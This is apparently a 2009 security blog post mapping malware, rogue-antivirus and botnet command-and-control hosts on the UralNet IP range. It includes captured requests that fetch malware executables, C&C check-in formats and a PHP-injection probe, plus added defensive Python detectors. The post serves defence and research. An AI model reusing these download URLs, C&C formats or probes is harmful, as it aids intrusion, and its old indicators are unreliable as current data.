
Bad Actors Part 5 - UralNet

I'm not actively picking on the Eastern Bloc, but finding purely malicious IP blocks there is duck soup.  In this posting I'll be looking at UralNet, which is registered to an organization in Russia, but appears to be administered out of the Ukraine.

inetnum:        91.211.64.0 - 91.211.67.255
netname:        Ural-NET
descr:          Ural Industrial Limited Company
country:        RU
address:        Russia, 620240 Ekaterinburg, Sofia Kovalevsaja st.
origin:         AS48511
role:           UralNet IP Master
address:        Ukraine, 69078 Kiev, Luteranskaya 28 st.
phone:          +38 050 577 65 61
abuse-mailbox:  abuse@uralnet.biz

Interestingly, I can't pull an MX or A record for uralnet.biz.  It doesn't appear they take abuse notifications too seriously.  Robtex.com offers an excellent routing graph (to show who provides their upstream services) that I should have been including in the previous entries.
[Image: Robtex routing graph for AS48511]

On 91.211.65.33 there are multiple variants of the Zbot trojan:
GET /ejik/admin.bin HTTP/1.1 (VirusTotal) 
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: 91.211.65.33

GET /ferrari/admin.exe HTTP/1.1 (VirusTotal)

Also it hosts the callback site:

POST /ejik/hot.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: 91.211.65.33
Content-Length: 260
Connection: Keep-Alive
Cache-Control: no-cache

.M.C?.zY.....#.6Z....."....h.Z..1...:.k.9.".gR..2...s..
Additionally, it hosts a page where the malware can quickly figure out what its public IP is, as opposed 
to its local IP which may be of the RFC1918 type. Comically, the script has some errors in the PHP code.
(psst, Zbot writer, <?php echo $_SERVER['REMOTE_ADDR']; ?> is all you need)
GET /ip.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)
Host: ramshabirthday.ru (91.211.65.33)
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Sat, 28 Feb 2009 09:22:33 GMT
Server: Apache/2
<br />
<b>Warning</b>: include_once(check.php) [<a href='function.include-once'>function.include-once</a>]: failed to open stream: No such file or directory in <b>/home/host1/domains/ramshabirthday.ru/public_html/ip.php</b> on line <b>2</b><br />
<br />
<b>Warning</b>: include_once() [<a href='function.include'>function.include</a>]: Failed opening 'check.php' for inclusion (include_path='.:/usr/local/lib/php') in <b>/home/host1/domains/ramshabirthday.ru/public_html/ip.php</b> on line <b>2</b><br />

On 91.211.64.40 we can see more Zbot:
GET /sad/demo.exe HTTP/1.1
Host: zatura.cn
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009011912 Firefox/3.0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
On 91.211.64.155 I see even more Zbot malware, although the site seems to be currently unreachable
(it was responding yesterday)
GET /account/file1.exe HTTP/1.1
Host: onlinestat.cn
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009011912 Firefox/3.0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
I found this malware on 91.211.65.118 via MalwareDomainList - Seems like more Zbot
GET /vip/bum.exe HTTP/1.0
User-Agent: Wget/1.10.2 (Red Hat modified)
Accept: */*
Host: 91.211.65.118
Connection: Keep-Alive
91.211.65.74 - redirects to malware, which turns out to be Trojan.Zlob
GET /?id=%2Fout.php%3Furls%3Dhttp%3A%2F%2Fporn_garbage HTTP/1.1
Accept: */*
Referer: http://www.gonzo-movies.com/
Accept-Language: en-us
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)
Connection: Keep-Alive
Host: pornorawa.com

GET /Xvidcodec.exe HTTP/1.1
Host: pornorawa.com
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009011912 Firefox/3.0.6

91.211.65.120 is a generic dropper site for lots of different pieces of malware. The directory structure
suggests that they use it to distribute malware for many different sources (read: people/groups), but
this is speculation.
GET /myfiles/132/v3/file.exe HTTP/1.1
Host: 91.211.65.120
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009011912 Firefox/3.0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
If-Modified-Since: Tue, 03 Mar 2009 01:01:59 GMT
Also: hxxp://91.211.65.120/myfiles/5/1/file.exe

file.exe - Seems to be a generic dropper, but Microsoft (who seems to refuse "generic" malware names)
calls it Trojan.Alureon
1.exe - Backdoor.PcClient

91.211.64.91 is hosting another dropper (Trojan.Alureon):
GET /o9s833f/uerty/461.exe HTTP/1.1
Host: 91.211.64.91
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009011912 Firefox/3.0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
91.211.65.99 is redirecting to AntiVirus2009 (which incidentally is hosted on 91.212.65.29, which, while only one number off, is not part of UralNet):
hxxp://onlinenotify.net/?a=ruler&code=49 -> hxxp://antivirus-xp-pro2009.com/cgi-bin/download.pl?code=49
91.211.64.33 is hosting another rogue as you can see below:
GET /promo/1/freescan.php?nu=77011812&back=%3Dxxxxx HTTP/1.1
Accept: */*
Accept-Language: en
Accept-Encoding: gzip, deflate
Referer: http://livesex.com/?traffic=trafficholder
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/523.12 (KHTML, like Gecko) Version/3.0.4 Safari/523.12
Connection: keep-alive
Host: proantimalwareonlinescan.com
91.211.64.68 hosts similar rogue AVs:
GET /download.php?nu=881068 HTTP/1.1
Host: www.liveantimalwarescanner.com
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009011912 Firefox/3.0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.liveantimalwarescanner.com/promo/2/freescan.php?nu=881068&back=%3Dxxxx%3DO
91.211.65.107 is hosting a Command and Control server for Rustock, one of the largest spam botnets:
POST /login.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Host: protectionforless.com
Content-Type: multipart/form-data
Content-Encoding: gzip
Content-Length: 96
Connection: Close
Pragma: no-cache
A few other malicious domains at that IP:
91.211.65.107-lekatariba.info
91.211.65.107-tlD9plg62.info

91.211.65.180 is hosting a C&C server for the Cimbot botnet. It has an interesting 3-stage communication that happens first over .gif files and then over SSL. Given its unique C&C structure, I'm surprised this botnet hasn't gotten more play by the malware authors.

The first stage looks like this:
GET /account/l.php?[bot id which is a 52 character uppercase string] HTTP/1.1
Host: vazasaki-ji.info
Accept: */*
Connection: close
It then sends back an md5 of data with the string 'fbc1' appended. This is pretty cute in that it looks like a random 36-character string, but if you see a ton of them stacked up in Wireshark, it's pretty obviously an md5 with 4 static characters appended:
GET /account/d.php?data=[md5 + 'fbc1'] HTTP/1.1
Host: vazasaki-ji.info
Accept: */*
Connection: close
Cookie: PHPSESSID=xxxxxxxxxx
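That second-stage pattern is easy to pick out of a batch of proxy logs once you know to look for it. The Python below is an added example and is not code from the post: it pulls the data= value out of each request line, checks for a 32-hex-character md5 prefix, and reports the tail that the batch has in common. The request lines are constructed (the hashes are md5 values of well-known test strings, not captured bot ids), and the function names are my own.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlparse

# Constructed request lines modelled on the d.php check-in above. The hashes are
# md5 values of well-known test strings, not values captured from the botnet; the
# fourth line is a control with a different tail, the fifth is the l.php first stage.
SAMPLE_REQUESTS = [
    "GET /account/d.php?data=9e107d9d372bb6826bd81d3542a419d6fbc1 HTTP/1.1",
    "GET /account/d.php?data=e4d909c290d0fb1ca068ffaddf22cbd0fbc1 HTTP/1.1",
    "GET /account/d.php?data=d41d8cd98f00b204e9800998ecf8427efbc1 HTTP/1.1",
    "GET /account/d.php?data=3f0b9b7e4a2d1c8e5b6a7f8091a2b3c4d5e6 HTTP/1.1",
    "GET /account/l.php?ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ HTTP/1.1",
]

REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d$")
HEX32 = re.compile(r"^[0-9a-f]{32}$", re.I)


def extract_data_values(lines):
    """Return the data= query values found in the request lines, in order."""
    values = []
    for line in lines:
        m = REQUEST_LINE.match(line.strip())
        if not m:
            continue
        query = urlparse(m.group("target")).query
        values.extend(parse_qs(query).get("data", []))
    return values


def split_md5_suffix(value):
    """Split a value into (md5_hex, tail) when it is 32 hex chars plus a short tail."""
    if len(value) <= 32 or not HEX32.match(value[:32]):
        return None
    return value[:32].lower(), value[32:]


def find_static_suffix(values, min_count=3):
    """Return (tail, count) for the most common tail shared by md5-prefixed values.

    One value on its own looks like a random 36-character string; stacking them
    up exposes the constant tail, which is what the post observes in Wireshark.
    Returns None when no tail reaches min_count.
    """
    tails = Counter()
    for value in values:
        parts = split_md5_suffix(value)
        if parts:
            tails[parts[1]] += 1
    if not tails:
        return None
    tail, count = tails.most_common(1)[0]
    return (tail, count) if count >= min_count else None


def flag_checkins(lines, min_count=3):
    """Return the request lines whose data= value carries the detected static tail."""
    found = find_static_suffix(extract_data_values(lines), min_count)
    if found is None:
        return []
    tail = found[0]
    flagged = []
    for line in lines:
        for value in extract_data_values([line]):
            parts = split_md5_suffix(value)
            if parts and parts[1] == tail:
                flagged.append(line)
                break
    return flagged


if __name__ == "__main__":
    print("shared tail:", find_static_suffix(extract_data_values(SAMPLE_REQUESTS)))
    for hit in flag_checkins(SAMPLE_REQUESTS):
        print("check-in:", hit)
```

The min_count threshold is what keeps a single hash-plus-tail from being reported; the technique only works on a batch, exactly as the post says.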
The last stage of the client check-in looks like the below text. Hopefully Julia will have some time over the next couple of days to really delve into the communication, as the "hiding data in .gif files" is pretty interesting:
POST /account/p.php HTTP/1.1
Host: vazasaki-ji.info
Accept: */*
Content-Length: 51
Connection: close
Cookie: PHPSESSID=xxxxxxxxxx
There is a second Cimbot domain on that IP as well:
91.211.65.180-e-tochihara.info

91.211.65.99 (lastcountb.com) hit me with lsp.exe, which AVs have come to the conclusion is
somewhere between "TR/Crypt.XPACK.Gen, (Suspicious) - DNAScan, Suspicious File, Medium Risk
Malware, Mal/EncPk-FO, and Suspicious.MH690.A". Thanks for clearing that up.
GET /cgi-bin/promo.pl?code=0000131 HTTP/1.1
Accept: */*
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)
Host: lastcountb.com

HTTP/1.1 200 OK
Date: Sat, 28 Feb 2009 18:58:04 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.8 with Suhosin-Patch mod_perl/1.30 mod_ssl/2.8.31 OpenSSL/0.9.8e
Content-Disposition: attachment; filename=lsp.exe
Content-Type: application/octet-stream;

Also on 91.211.65.99 is hxxp://onlinenotify.net/land/eurl/1.html?code=00000005 which redirected me
to:

91.211.65.100 which hit me with this rogue AV:
GET /cgi-bin/download.pl?code=00000005 HTTP/1.1
Host: antivirus-xp-pro2009.com
Referer: http://onlinenotify.net/land/eurl/1.html?code=00000005

HTTP/1.1 200 OK
Date: Tue, 03 Mar 2009 02:16:55 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.8 with Suhosin-Patch mod_perl/1.30 mod_ssl/2.8.31 OpenSSL/0.9.8e
Content-Disposition: attachment; filename=SetupAntivirusXP.exe

Going back to 91.211.65.99 (onlinenotify.net) I wanted to highlight some fun language, italicized for effect:


GET /winlogon.htm HTTP/1.1
Accept: */*
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)
Host: onlinenotify.net
Many viruses were found on your computer such as : Trojan horse, PassCapture, etc. Your 
personal information can fall into in the "third hands". Please check up the computer with a
special software.

I agree, those "third hands" can be a real bugger.

Also on this IP:
91.211.65.99-freewebscaners.com

91.211.65.76 is hosting a ton of exploits, as most drive-by-download pages do.    

Much of the traffic is getting driven/redirected from a malicious ad not hosted at UralNet-
hxxp://www.ads.havamedia.net/abm/abmw.aspx?z=166&isframe=true

The malicious server was being hosted at SoftLayer, but as has become customary when dealing with
them, they responded in approximately 3 minutes, confirmed the host was bad, and booted it offline.
Thanks, abuse team!
http://fannyniger.com/dol/index.php
/dol/load.php
/getfile.php?f=png
/dol/vparivatel.php
/dol/pdf.php?f=all

Also on that IP are the malicious pages:
91.211.65.76-awasr.cn
91.211.65.76-givemelog.cn

91.211.64.68 is another address used by rogue AVs:
GET /promo/1/img/alert.gif HTTP/1.1
Host: proantimalwareonlinescan.com
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Referer: http://proantimalwareonlinescan.com/promo/1/freescan.php?nu=77024202&back=%3DTQy1zT4NYMNMI%3DM
Also on this IP are the following malicious domains:
91.211.64.68-advancedproantivirusscan.com
91.211.64.68-bulletproofmonk.cn
91.211.64.68-promolegotools.cn
91.211.64.68-thebestworldparty.cn
91.211.64.68-verifyclickssystem.cn

91.211.65.76 - Some web exploits hosted here are being redirected from that earlier ad site:
GET /spl/index.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.48 Safari/525.19
Referer: http://www.ads.havamedia.net/abm/abmw.aspx?z=166&isframe=true
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Host: givemelog.cn

GET /spl/vparivatel.php?a HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://www.ads.havamedia.net/abm/abmw.aspx?z=166&isframe=true
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: givemelog.cn
GET /spl/vparivatel.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://givemelog.cn/spl/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: givemelog.cn
91.211.64.33 - More rogues:
GET /promo/1/freescan.php?nu=77000303&back=%3DDQy0DT4NYMNMI%3DN HTTP/1.1
Host: proantimalwareonlinescan.com
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.6) Gecko/2009011912 Firefox/3.0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://adsdeliverysystem.com/cmp/scr.php?a=754742&lang=en-US&id=435&ref=http://skreemr.com/results.jsp?q=reckoner+remix&search=SkreemR+Search
91.211.65.120 - This is hosting updates for Trojan.Alureon
GET /banner/crcmds/main HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)
Host: 91.211.65.120
Pragma: no-cache
91.211.65.23 - tinnily.info redirects me to hxxp://scan4zoom.com/22/?uid=122 which installed this malware:

GET /cgi-bin/redirect.pl?id=999901&ref=http%3A//kiffpuzevgolf.livejournal.com/5041.html HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-silverlight, */*
Accept-Language: ko
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB 14.52; .NET CLR 2.0.50727)
Host: tinnily.info
Connection: Keep-Alive

91.211.65.23 - Another interesting redirector is hosted on this IP. My browser downloaded a "perl" script as opposed to displaying it inline. Perhaps this page is traditionally included as opposed to surfed to directly:
GET /cgi-bin/weather.pl?id=412020&k=sophie+marceau+cannes&name=sxr020&ref= HTTP/1.0
User-Agent: Mozilla/3.01Gold (Macintosh; I; 68K)
Host: www.mypersonalhttp.com:8080

Looking at that script you see the following obfuscation:
[Image Ural1: screenshot of the obfuscated script]

Deobfuscating (and reordering a bit) the above you can see an interesting tidbit - they are attempting to detect whether you are a crawler, and if so, the page won't redirect you to malware! That's one way the malware folks are trying to stay off the StopBadware (et al.) radar.

[Image Ural2: the deobfuscated script, showing the crawler check]
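Differential fetching is the practical counter to this kind of cloaking: request the same URL as a browser and as a crawler, then compare what comes back. The Python below is an added example, not code from the post or from the redirector. fake_fetch is a constructed stand-in that mimics the behaviour described above (a crawler-looking User-Agent gets a harmless page, a browser gets bounced onward) so the block runs offline; the hostnames are .invalid placeholders and the ExampleScanner User-Agent is made up.

```python
import hashlib

BROWSER_UA = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
# One real crawler UA (Googlebot) and one constructed scanner UA.
CRAWLER_UAS = [
    "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
    "ExampleScanner/1.0 (crawler)",
]


def fake_fetch(url, user_agent):
    """Constructed stand-in for an HTTP client; contacts nothing.

    It reproduces the behaviour the post describes: a client that looks like a
    crawler gets a harmless page, everyone else gets a redirect. To run this
    against a live redirector, swap in a real fetch (urllib or requests, with
    automatic redirects disabled so the Location header is visible).
    """
    markers = ("bot", "crawl", "spider")
    if any(m in user_agent.lower() for m in markers):
        return {"status": 200, "location": None, "body": "<html>weather: sunny</html>"}
    return {"status": 302, "location": "http://next-hop.invalid/load.php", "body": ""}


def response_fingerprint(resp):
    """Reduce a response to (status, redirect target, short body hash) for comparison."""
    digest = hashlib.sha256(resp["body"].encode("utf-8")).hexdigest()[:16]
    return (resp["status"], resp["location"], digest)


def detect_cloaking(url, fetch=fake_fetch, browser_ua=BROWSER_UA, crawler_uas=CRAWLER_UAS):
    """Fetch url as a browser and once per crawler UA; return the UAs that got a different answer.

    Result maps crawler UA -> {"browser": fingerprint, "crawler": fingerprint}.
    An empty dict means every client saw the same thing, i.e. no cloaking seen.
    """
    baseline = response_fingerprint(fetch(url, browser_ua))
    differing = {}
    for ua in crawler_uas:
        fp = response_fingerprint(fetch(url, ua))
        if fp != baseline:
            differing[ua] = {"browser": baseline, "crawler": fp}
    return differing


if __name__ == "__main__":
    for ua, seen in detect_cloaking("http://redirector.invalid/cgi-bin/weather.pl").items():
        print(f"{ua}: browser got {seen['browser'][0]} -> {seen['browser'][1]}, "
              f"crawler got {seen['crawler'][0]}")
```

Comparing the redirect target as well as the body matters here: the cloaked page and the real page can both be 200s with different bodies, or the browser path can be a bare 302 with an empty body, and either difference is the signal.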

Other malicious sites on that IP:

91.211.65.23-australianpornomovies.com
91.211.65.23-warwork.info

91.211.65.110 - Tried to install this rogue AV
GET /hitin.php?land=20&affid=02401 HTTP/1.1
Host: stabilityscanonline.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 (.NET CLR 3.5.30729)
Referer: http://crazypornride.com/mgp/0635cqj2/0404xyt/fcum.htm

Mp3s are being sold illegally using these 8 A records for mp3sparks.com. Two are at ZlKon (Latvia),
two at UralNet (Russia/Ukraine), two at Honduras Web, and two registered to "hknetcom.biz" in Hong
Kong. The NS records for hknetcom.biz are ns1 and ns2.false.com - these people clearly are not a
legitimate company.
115.126.5.121, 94.247.3.33, 91.211.65.12, 115.126.5.75, 200.63.45.6 - img.mp3sparks.com, covers.mp3sparks.com
115.126.5.76, 94.247.3.34, 91.211.65.13, 115.126.5.122, 200.63.45.7 - mp3sparks.com, www.mp3sparks.com

91.211.64.118 - Surfing to this exploit page...
GET /sss/in.cgi?7 HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://dvcd.info/evo/count.php?o=4
Accept-Language: en-us
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Host: porgacig.cn
...made my VM go and download this spambot malware.
GET /nuc/exe.php HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: hayboxiw.cn
Connection: Keep-Alive
Malware sites also on this IP:
91.211.64.118-ffseik.com
91.211.64.118-teirkmm.net

91.211.65.86 is hosting an "informational" page similar to ramshabirthday.ru/91.211.65.33 for the
malware owner to get a quick snapshot of the infected system.
POST http://russianwolf.ru/proxy5/check.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: russianwolf.ru
Pragma: no-cache
Accept: */*

REQUEST_INFO_PAGE_4896485_CODE
REMOTE_ADDR=my_ip_address
HTTP_CLIENT_IP=
HTTP_X_FORWARDED_FOR=
HTTP_X_FORWARDED=
HTTP_X_COMING_FROM=
HTTP_FORWARDED_FOR=
HTTP_FORWARDED=
HTTP_COMING_FROM=
HTTP_VIA=
HTTP_XROXY_CONNECTION=
HTTP_PROXY_CONNECTION=
HTTP_USER_AGENT=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009011912 Firefox/3.0.6
HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
HTTP_CONNECTION=keep-alive
GATEWAY_INTERFACE=CGI/1.1
REQUEST_METHOD=GET
HTTP_REFERER=
POST=
COOKIE=
91.211.65.25 has been hammering a few of my personal sites over the past few days looking for vulnerabilities in various web applications that I don't have installed:
GET /rc/
GET /rcube-mail/
GET /roundcube/
GET /mail/
GET /roundcubemail-0.1beta2/

POST /xxxxxxxx/gallery/albums/xxxxxxx.php HTTP/1.1
Accept: */*
Content-Length: 65
Content-Type: application/x-www-form-urlencoded
f=echo+%282%2B2%29%3B&PARAM_HASH=xxxxxxxxxxxxx
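Two things in that traffic are worth automating on a web server you defend: spotting a client that walks through install paths for software you do not run, and decoding form bodies to see what a probe actually sends (the f field above decodes to echo (2+2);, a harmless expression whose output would tell the sender that the field is being evaluated as PHP). The Python below is an added example, not from the post; the access-log lines are constructed (only the source IP is from the post), the form body is the one shown above, and the path list and function names are my own.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs

# Constructed Apache common-format log lines modelled on the probing described
# above. The first client's IP is the one from the post; timestamps and the
# control client 198.51.100.7 (one stray /mail/ request) are made up.
SAMPLE_LOG = """\
91.211.65.25 - - [05/Mar/2009:10:14:01 +0000] "GET /rc/ HTTP/1.1" 404 291
91.211.65.25 - - [05/Mar/2009:10:14:02 +0000] "GET /rcube-mail/ HTTP/1.1" 404 291
91.211.65.25 - - [05/Mar/2009:10:14:02 +0000] "GET /roundcube/ HTTP/1.1" 404 291
91.211.65.25 - - [05/Mar/2009:10:14:03 +0000] "GET /mail/ HTTP/1.1" 404 291
91.211.65.25 - - [05/Mar/2009:10:14:03 +0000] "GET /roundcubemail-0.1beta2/ HTTP/1.1" 404 291
198.51.100.7 - - [05/Mar/2009:10:15:00 +0000] "GET /index.html HTTP/1.1" 200 2048
198.51.100.7 - - [05/Mar/2009:10:15:01 +0000] "GET /mail/ HTTP/1.1" 404 291
"""

# The form body from the post, hash value left exactly as the post shows it.
SAMPLE_BODY = "f=echo+%282%2B2%29%3B&PARAM_HASH=xxxxxxxxxxxxx"

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

# Well-known webmail install paths (the ones the post lists). Requests for them
# on a host that does not run the application are reconnaissance, not traffic.
WEBMAIL_PATHS = {"/rc/", "/rcube-mail/", "/roundcube/", "/mail/", "/roundcubemail-0.1beta2/"}

# Constructs that show up when someone tests whether a field reaches eval()/include().
PHP_CODE = re.compile(
    r"\b(echo|eval|system|exec|passthru|shell_exec|assert|base64_decode)\b\s*\(", re.I
)


def parse_log(text):
    """Parse log text into dicts with ip, ts, method, path, status; unparseable lines are skipped."""
    entries = []
    for raw in text.splitlines():
        m = LOG_LINE.match(raw)
        if m:
            entries.append({**m.groupdict(), "status": int(m.group("status"))})
    return entries


def find_probing_clients(entries, min_distinct=3):
    """Return {ip: sorted probed paths} for clients that 404 on >= min_distinct webmail paths."""
    misses = defaultdict(set)
    for e in entries:
        if e["status"] == 404 and e["path"] in WEBMAIL_PATHS:
            misses[e["ip"]].add(e["path"])
    return {ip: sorted(paths) for ip, paths in misses.items() if len(paths) >= min_distinct}


def decode_form_body(body):
    """Decode a urlencoded body into {field: value}, keeping the first value per field."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def php_injection_fields(body):
    """Return the field names whose decoded value looks like PHP code."""
    return sorted(k for k, v in decode_form_body(body).items() if PHP_CODE.search(v))


if __name__ == "__main__":
    print("probing clients:", find_probing_clients(parse_log(SAMPLE_LOG)))
    print("decoded body:", decode_form_body(SAMPLE_BODY))
    print("suspicious fields:", php_injection_fields(SAMPLE_BODY))
```

The min_distinct threshold is there so one mistyped /mail/ link from a legitimate visitor does not get the same treatment as a client that enumerates five install paths in two seconds.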

91.211.64.87 is hosting a fake Youtube site. This is interesting in that it appears to load in the real 
youtube.com content and uses CSS to convince you that you need to update your Flash player.
Youtube has actually pushed out Flash updates in the past when there is a particularly nasty
vulnerability, so I had to double check that it was malware. Which it was.
GET /?lang=en-yt&id=1&ef=&q=courteney+cox+longest+yard HTTP/1.1
Host: www.youtube.com.results-search.query.usasrv01.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 (.NET CLR 3.5.30729)
Referer: http://xopysoki.com/i/liveold/?ref=http%3A//www.google.com/search%3Fq%3Dcourteney+cox+longest+yard%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a

[Image Ural3: screenshot of the fake YouTube page]

91.211.64.180 - Another exploit page:
GET /cgi-bin/index.cgi?js HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X; es-es) AppleWebKit/523.15.1 (KHTML, like Gecko) Version/3.0.4 Safari/523.15
Referer: http://www.creativosenvivo.com/rioceballos/ubicacion_geografica.html
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: es-es
Accept-Encoding: gzip, deflate
Connection: keep-alive
Host: 91.211.64.180
This exploit created C:\7yksfi.exe which was Trojan.Meredrop. It went on to create bph2d6.exe and emqsys.dll which are both part of Trojan.Tibs. It also installed a password stealer (setupapi.dll) into both Internet Explorer and Firefox.

91.255.64.147 - There was a fun web exploit on this page that walked you through numerous steps and
faked the User-Agent each time before it delivered the final malware, again, to ensure you weren't a
crawler.
GET /order/cd.php?userid=xxx_xxx_xxx HTTP/1.1
User-Agent: AS
Host: beautytraffic.com
Cache-Control: no-cache

POST /order/dan.php HTTP/1.1
Referer: SAS
Content-Type: application/x-www-form-urlencoded
User-Agent: AE
Host: beautytraffic.com

POST /order/sdt.php HTTP/1.1
Referer: SAS
Content-Type: multipart/form-data; boundary=xxxx
User-Agent: A
Host: beautytraffic.com

91.211.65.130 - More rogue AVs hosted here:
GET /hitin.php?land=20&affid=00201 HTTP/1.1
